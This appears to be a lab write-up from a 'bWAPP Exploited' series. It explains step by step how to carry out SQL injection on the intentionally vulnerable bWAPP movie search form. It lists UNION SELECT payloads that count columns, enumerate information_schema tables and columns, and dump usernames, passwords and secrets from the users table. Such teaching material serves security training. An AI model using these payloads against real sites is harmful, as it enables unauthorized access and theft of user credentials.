Exploited !

SQL Injection (Search)

Security Level : Low

SQL Injection is one of the most dangerous vulnerability you can find in a website. We will see why and how ...

In this challenge, bWAPP is asking us to search the database for our favorite movie.

Typing "credible" in the search field gives us one entry : "The Incredible hulk" (It looks like bees are Marvel addicted)
So we can be pretty sure that the query is something like :
"Select col1,col2,col3 from mytable where movie LIKE '%". $userinput ."%'"
If the form is vulnerable, introducing a single " ' " should throw a SQL error because Select col1,col2,col3 from mytable where movie LIKE ''' is not a valid query.

Good ! The form could be vulnerable.
Would you like to retrieve some user secrets from the database ?
Of course you do :), but before we have to know more : how many columns are returned ?
To find the answer we can use an 'ORDER' clause inside our query : ' order by 3 -- -
The query sent to the database will be something like : Select col1,col2,col3 from mytable where movie LIKE '%' order by 3 -- -%' which means the result will be ordered by the third column...if it exists ! Otherwise a SQL error will be thrown.
First, we'll try with 7 columns.

Now we know the query contains at least 7 columns as no error is thrown.
We can try with 8 columns.

Error ! So the query contains 7 columns !
We can now perform some evil queries, first find the current database :
' and 1=0 union all select 1,2,database(),4,5,6,7 -- -
With "and 1=0 " because we only want to get data from our union all statement.

As you can see, our database is called "bWAPP" (Of course we could have guessed it)
Is there a table called "users" in this beehive ???
Query : ' and 1=0 union all select 1,table_schema,table_name,4,5,6,7 from information_schema.tables where table_schema != 'mysql' and table_schema != 'information_schema' -- -

Ohooo :) table 'users' exists.
What are the columns ?
Query : ' and 1=0 union all select 1,table_name, column_name,4,5,6,7 from information_schema.columns where table_schema != 'mysql' and table_schema != 'information_schema' and table_schema='bWAPP' and table_name='users' -- -

Now we have all we need to retrieve all users secrets !
One last query : ' and 1=0 union all select 1,login,password,secret,email,admin,7 from users-- -

OWASP Link :

bWAPP Exploited / © 2013 David Bloom (Twitter @philophobia78)